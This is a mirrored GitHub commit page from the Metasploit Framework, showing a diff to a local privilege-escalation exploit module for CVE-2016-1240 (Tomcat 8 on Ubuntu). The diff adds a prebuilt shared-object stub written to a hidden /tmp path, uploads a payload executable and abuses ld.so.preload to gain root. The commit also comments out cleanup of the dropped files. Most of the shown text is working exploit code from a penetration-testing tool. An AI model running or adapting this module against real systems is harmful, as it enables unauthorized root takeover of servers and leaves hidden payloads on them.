mirror of
https://github.com/rapid7/metasploit-framework
synced 2024-10-09 04:26:11 +02:00
tomcat 8 priv esc on ubuntu prebuilt so file
This commit is contained in:
parent
2b09af78e1
commit
34b1e66f90
BIN
data/exploits/CVE-2016-1240/stub.so
Normal file
BIN
data/exploits/CVE-2016-1240/stub.so
Normal file
Binary file not shown.
@ -133,18 +133,28 @@ class MetasploitModule < Msf::Exploit::Local
|
||||
)
|
||||
print_good("Original #{catalina} backed up to #{path}")
|
||||
|
||||
# Upload payload executable
|
||||
payload_path = "#{base_dir}/.#{rand_text_alphanumeric(5..10)}"
|
||||
vprint_status("Uploading Payload to #{payload_path}")
|
||||
upload_and_chmodx payload_path, generate_payload_exe
|
||||
register_file_for_cleanup(payload_path)
|
||||
|
||||
if live_compile?
|
||||
# upload our privesc stub
|
||||
so_stub = ".#{rand_text_alphanumeric(5..10)}.so"
|
||||
so_stub_path = "#{base_dir}/#{so_stub}"
|
||||
payload_path = "#{base_dir}/.#{rand_text_alphanumeric(5..10)}"
|
||||
|
||||
# Upload exploit stub
|
||||
vprint_status "Compiling exploit stub: #{so_stub_path}"
|
||||
upload_and_compile so_stub_path, strip_comments(exploit_data('CVE-2016-1240', 'privesc_preload.c').gsub('$BACKDOORPATH', payload_path)), '-Wall -fPIC -shared -ldl'
|
||||
register_file_for_cleanup(so_stub_path)
|
||||
else
|
||||
payload_path = '/tmp/.jMeY5vToQl'
|
||||
so_stub = '.ny9NyKEPJ.so'
|
||||
so_stub_path = "/tmp/#{so_stub}"
|
||||
|
||||
write_file(so_stub_path, exploit_data('CVE-2016-1240', 'stub.so'))
|
||||
end
|
||||
# Upload payload executable
|
||||
vprint_status("Uploading Payload to #{payload_path}")
|
||||
upload_and_chmodx payload_path, generate_payload_exe
|
||||
# register_file_for_cleanup(payload_path)
|
||||
|
||||
# register_file_for_cleanup(so_stub_path)
|
||||
|
||||
# delete the log and symlink ld.so.preload
|
||||
vprint_status("Deleting #{catalina}")
|
||||
|
Loading…
Reference in New Issue
Block a user